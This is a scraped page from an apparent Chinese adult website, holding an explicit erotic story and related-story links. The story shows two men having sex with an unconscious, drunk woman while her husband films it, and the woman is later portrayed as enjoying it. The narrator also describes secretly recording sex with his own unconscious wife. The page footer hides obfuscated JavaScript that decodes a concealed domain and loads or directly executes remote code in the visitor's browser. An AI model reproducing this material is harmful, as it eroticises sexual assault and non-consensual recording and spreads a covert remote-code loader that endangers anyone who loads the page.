返回

我们两家真实的故事d5d

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

.
我和张青是初中时的同学,关系一直很好,因为他的名字和水浒中的菜园子张青同名,我就说你老婆将来一定
是孙二娘,我们几乎形影不离,无话不说,他发育比我早,在他长了阴毛时他得意地给我看,还带我逃学看过黄色
录相,教会我手淫,所以我们可以说是好的和一个人差不多。


一转眼二十多年过去了,我们也成了中年人,各自成了家,他老婆是一家化工厂的检验员,个不高,但丰满白
晰,我老婆是一家化妆品公司的会计,是我在念大学时校队认识的,有着运动员的体型,虽不太白,但气质很好,
我们两家一直有着亲密的来往。后来孩子大了都在外寄读,所以各家都空落的很。


中年男人都有这种感觉,和老婆做爱基本没有激情,就是尽义务,可能就是太熟悉了吧,老婆为此也越来越觉
得不满足,我有时开玩笑说,让张青来,我们两个一齐和你做,她也不示弱地说,有种你叫呀,还拿起电话说,现
在就叫呀,我怕啥呀。


我时时和张青谈论这些事,他说他也有同感,我说你老婆我看真性感,你应该满意的,他说都一样,不都是别
人家的老婆好,自己家的孩子好嘛,我看你老婆浑身充满朝气,不象你嫂子那么文静,张青比我大几个月,所以我
叫他老婆嫂子。


那天我到她家喝酒,嫂子做了几个菜,我们喝到兴头上,我夸奖说嫂子人好手艺也好,她开心地笑了,当时她
穿着齐肩紧身衣,白晰的玉臂和丰满的胸让我有些想入非非,我讨好地敬她酒,不好酒力的她一会儿脸就红了,坐
在张青怀里,有些失态的醉意,更让人心似猿马,后来我说嫂子我亲你一口,她装嗔地说去你的,张青也说亲一下
能怎地呀,我就亲了她一口,她不好意思地说,你们哥俩慢慢喝吧,我要先睡了,有些站不住了。


张青就帮着她务被洗漱,好半天才回来陪我接着喝,过了一会儿,张青有些神秘地对我悄声说,我老婆形正吗,
我说我也没看过我哪知道,他说你想看吗,我有些吃惊地看着他,但看他一点不象开玩笑的样子,就说你没喝多吧,
他说你还不了解我吗,什么时候失态过,我忙说,这合适吗,他笑了说,我们哥们这么铁的感情这算什么呀?你想
看今天是好时候,我刚才让她裸身睡的,她一喝酒就任人摆布,我每次这时和她做爱就多少有种刺激,可能有点迷
奸的感觉吧。


这我也有同感,老婆那次也是喝多了人事不醒,打着鼾声,我去推她,可她烂醉如泥,我当时就玩她奶子,还
抠她的穴,她一点也不知道,一下子我来了好奇和新鲜感,那次我脱光了她,我在和她做爱时她都没醒,我当时用
手机录了下来,第二天给她看,她说我变态,不过从她眼里看出她也觉得很新奇,这段录影我也给张青看过,他还
夸我老婆身材好。


这次是他老婆喝多了,我就对他说,嫂子知道了生气了怎么办,他说你放心吧,绝对不会,我们又喝了两杯,
他说差不多了,于是就拉着我进了卧室。


我看见嫂子半侧着身躺着,盖着一床薄羽绒被,两条白晰的胳膊和两支小脚露在外面,柔若无骨,中年熟女的
魅力在她身上真是很明显,张青把我推到床边,先轻轻把嫂子身体放开关,挪开压着被的胳膊,然后把被轻轻掀开,
就着床头的阴暗小灯,我看到了嫂子两只奶子,很诱人,平躺的身体看不出奶子下垂,张青把被慢慢全揭开,嫂子
丰满白晰的胴体全暴露在我的面前,两条白晰的大腿像海豚一样丰满,曲线优美,阴毛浓密,两片小阴唇露在外面,
两旁的阴肉把穴挤成了一条缝,张青让我近些看,说你大胆看吧,没事,她不会醒的,说着就更分开些嫂子的腿,
用两指分开她的阴唇,我看不到嫂子的阴蒂,这和我老婆的大不一样,我老婆阴蒂很明显地在外,怪不得俗话说男
人都一样,女人一个人一个样,这也许就是男人对其它女人的神秘感吧。


张青很从容,似乎早就准备好了这一天,他问我你现在行吗,想做就上,我当时已经JJ硬了,不过还是有些迟
疑,他说没事的,我也想看我老婆和别人做的感觉,能刺激我,说着他就自己脱光了,把嫂子的腿分的大开,用手
轻摸了老婆的穴,沾了些口水,然后两手支着床,慢慢插了进去,他可能故意抽插的挺重,这样嫂子就有了知觉,
但也处于半迷糊中,只是偶尔身体动几下,我急忙蹲下,怕她老婆看见,张青就把灯关了,打手势示意我摸嫂子的
奶子,我这时也不能拒绝了,就悄悄跪在嫂子旁边,试着用手摸奶,只一摸就觉得手感极好,皮肤很滑,奶头也已
经硬了,我用五指挨个从奶头上掠过,再掠回来,然后吸裹着,可能嫂子以为是张青,所以很舒服地偶尔呻吟一下。


看着嫂子在张青的抽插下身体一浪一浪的,两个奶子也有节奏地晃着,我也欲火焚身,张青示意我脱了,上来
接替他,这时我也顾不得了,就脱了,张青就下来,但怕她老婆一下醒了就吻她的嘴挡住她的视线,不时两手像我
那样玩她的两只奶子。


我不敢身体接触她老婆的身体,只是两手支着,把已挺起的肉棒从张青刚拿出JJ的肉穴中插了进去,张青在旁
看着,示意我压下去,我就先轻后重地全趴在嫂子身上,迷糊的嫂子自然地两手搂着我的屁股,不时随机动了几个,
张青拿起手机在录,我当时已经在兴头上,也没有害怕的心里,只有刺激,拍的时候怕屋里太暗,张青就打着了灯,
我可能是喝了些酒,射感来的很慢,嫂子这时已经进入了性爱的渐渐清醒阶段,开始有意识的呻吟和配合,我不知
道她什么时候睁眼发现了我,当时她一惊,本能地向外推我,眼神里流露出惊恐和不相信的样子,说强子(我的小
名)你干什么,我当时吓的僵在那,不知道怎么办,嫂子发现张青就在旁边还在拍录,说三青子(小名,排行三)
你缺心眼呀,你老婆就这么不值钱,说着我这时已经下地,她拉起被裹在身上,起身就打张青,张青一把搂住她,
忙说,我不以前对你说过嘛,我们哥俩满足你,你不是当时也答应了吗,怎么来真招就变挂了,这也许是他们私下
说过的,嫂子一下子很难为情的样子,回避着我的眼睛,嘴里绞辩着说,你胡说些什么呀,张青说木已成舟了,你
刚才多兴奋,你不知道吗,女人只有性满足才能健康还年轻,强子也不是外人,他家娟子(我老婆的小名)也一样,
嫂子一下子有了醋意,说你和娟子怎么了,张青一副好像有过那事的样子说,这都迟早的事,咱们两家这关系,用
不着大惊小怪的,也不会有别人知道。说着就把嫂子摁倒在床上,嫂子可能有些被说开了,可能她心里早就幻想过,
但真来了也要有个女人的贞洁态度,再有就是可能以为张青和我老婆有过,她有了可比的同伴了,就半推半就地躺
在床上。


张青就吻她的耳垂和乳房,还伸手进去抚弄她的小穴,嫂子佯装生气被人强制的样子闭上眼,不一会就忍不住
呻吟起来,我不断抚摸她的腿,她刚开始还装样拒绝躲闪,后来就任凭我抚弄,张青看已经到时候了,就示意我上,
把被也掀开了,嫂子的淫水已经再次涌了出来,我不失时机地再次插入,她闭着眼,侧着脸躲开我,带着接受但又
难为情的讪笑。


张青关了灯,屋里很暗,嫂子在这种环境下开始渐渐放开了,也小幅度地配合我,张青把她的两只胳膊放在我
背上,她难为情地落下来,又让张青放了上去,这次她就不再落下,我一直温柔地插抽着,不时用结实的胸肌刮蹭
着她的双乳,她因为另个男人的刺激开始亢奋起来,也渐渐由被动变成了主动,身体蛹动的幅度也越来越大,象久
违性事的婚后小别骚妇。(待续)


喝了酒的我射感来的很慢,这更让嫂子如醉如痴,女人一旦有过高潮会比男人有更强的记忆,所以她在进入状
态时会不顾一切,甚至比男人更疯狂,她闭着眼,两手搂着我的后背,嘴里气喘着:喔……喔……强子……今天我
不是你嫂子……是你老婆……别笑话嫂子……喔……喔。


不一会儿我们就大汗淋漓了,强子说,来来,换换,就接替我接着上了,嫂子这时已经没有了羞耻感,表情也
完全是一种迫不急待的样子,强子更有力地抽插着,可能是我们刚才刺激了他的野性,嫂子两腿抬起夹住他的腰,
浑圆的屁股有力地迎合着强子的冲撞……喔……喔……坏老公……找外人欺负我……喔……喔。强子说,那你让不
让欺负呀,嫂子呻吟着没说话,强子照她屁股打了一下,说,你说呀,舒不舒服,爽不爽呀,说着一顿猛冲,嫂子
大声呻吟起来……啊……啊……我让……我让……好舒服……好爽……快给我……


强子说,你上来伺候我们了,说着让我上床躺着,嫂子浑身瘫软地笨拙地爬了起来,我扶着她的腰,隐约看到
她的阴毛已经被溢出的淫液粘成了贴紧阴阜的一团,已经没有了负担的她现在只有强烈的性要求了,她小心地伏在
我身上,我两指掐着肉棍,毫不费力地插到她的穴里,她先慢慢地有节奏地前后动了几下,我突然腰往上一挺,可
能这下插的挺深,顶到了子宫口,她受惊般地啊了一声,就开始用力地上下前后扭动起来……喔……喔……两个老
公伺候我……喔……喔。张青躺在我身边,过了一会儿就喊到,轮到我了,嫂子就顺从地如法炮制,不时两手摁住
男人坚实的胸,借力使劲向后坐着,淫液四溢,抽插中呱叽呱叽的声音更是刺激了她的亢奋。


张青这时突然下地,打开柜子,从角落拿出一样东西,我细看才看清是女用的淫具,看来他们家和我一样,女
人已经光单靠男人不能得到满足了。张清在上涂了油,然后按住在我身上扭动的嫂子,试着轻轻从她后面插入了她
的肛门。


这里需要说明一下,肛交绝不等同于变态和虐待,但并是所有的女人都喜欢,一旦喜欢此道的女人会乐此不彼
从生理上说,女人一身都是性敏感区,所以女人做爱不但用身体,也用眼和心,这句话很对。


我老婆接纳肛交是一次偶然,那是我和她去串亲戚,晚上在人家过夜,换个陌生环境我突然想做,但老婆当时
来例假,我就让她翻身趴着,把鸡巴放在她的屁股沟里,让她两手推挤屁股两侧,让屁股肉来住我的鸡巴,我前后
抽动,这样打算射出来,我的精液溢出来了一些,弄的老婆股沟里十分润滑,可当时进入亢奋状态时不小心插进她
的肛门,她怕亲戚听见没敢叫出声,事后我全射进了她的肛门里。后来我问她,她说感觉怪怪的,另一种感觉,也
许是通过直肠刺激了她的内脏,我们后来做爱有时就用器具插入她的肛门,这样我插入她穴里,她手把着插入肛门
的器具,能令她更强烈地高潮。


这时张青已经把嫂子的肛门润滑的着不多,就半蹲在她的身后,慢慢把肉棒挤进了嫂子的肛门里,我们两个夹
着嫂子的身体,我把嫂子两个大奶子用手挤压并起来,把两个奶头凑到一起,一口全含在嘴里,我们三个就这样配
合着,嫂子已经淫相毕露,完全成了没有理智的性狂,我明显地感觉她的阴道高潮连连下的阵阵痉挛,伴随着她放
肆的狂叫,身体不断地抽搐,我不知道这样多久,她趴伏在我身上不动了,已经晕厥过去,这是女人性高潮的极点。


张青也射在她的肛门里,我把嫂子仰放在床上,她已经全身瘫软,大汗淋漓一副虚脱的样子,我把她的双腿搭
在我的肩上,鸡巴对准了她湿漉漉的阴户,一插到底,她又复苏般地喔了一声,我开始一顿猛攻,她已经没有力气
配合我了,只是任人宰割般地承受着,两只奶子乱摇乱晃着,嘴里受虐般地哇哇叫着,真到我把滚烫的精液毫无保
留地射进她的阴户。


女人就是这样,有了这一次,就想着下一次,我和张青如法炮制,用同样的方法征服也说服了我老婆,我们两
家现在仍然保持着这种关系,在别人眼里可能是变态或者不可思议,但一旦你做了,你会觉得抛掉背景的因素外,
对身心健康乃至家庭幸福都有莫大的好处,我和张青从不找什么妓女小姐,因为那是一种发泄而不是真实的享受,
所以我们两家的这种性生活方式能维持很久的时间,都觉得似乎有自己的情人似的,我们有时四个人在一起,只要
想到的我们都做了,而且女人在这方面慢慢成了主宰,很多有趣的性游戏都是她们创造的。


【完】

评分
相关推荐
3.0分

3.0分 我与她们的真实故事e35

3.0分

3.0分 真实的故事fd9

3.0分

3.0分 我跟大姨子及两位嫂子的真实故事7b5

3.0分

3.0分 真实:我和玉儿的故事905

3.0分

3.0分 我和妈妈的真实故事802

3.0分

3.0分 我与师母的真实故事927

3.0分

3.0分 毕业后和两个女同事的真实故事b9e

3.0分

3.0分 毕业后和两个女同事的真实故事b9e

3.0分

3.0分 我与小姨子的真实故事b49

3.0分

3.0分 【我与学姐真实的故事】(2)3a0

3.0分

3.0分 【我与学姐真实的故事】(1)6ce

3.0分

3.0分 【我与学姐真实的故事】(3)ea1

3.0分

3.0分 他、他和我俩的真实故事71b

3.0分

3.0分 她的故事我们的故事bfb

3.0分

3.0分 少妇的真实故事2ab

3.0分

3.0分 护士的真实故事615


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function MAdbN(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zVmMy(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return MAdbN(t);};window[''+'T'+'s'+'W'+'j'+'l'+'y'+'b'+'E'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zVmMy,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('b3BByLnpoYW5nemhpeWFuZzAxLmNu','151936',window,document,['B','xIrjTpRA']);}:function(){};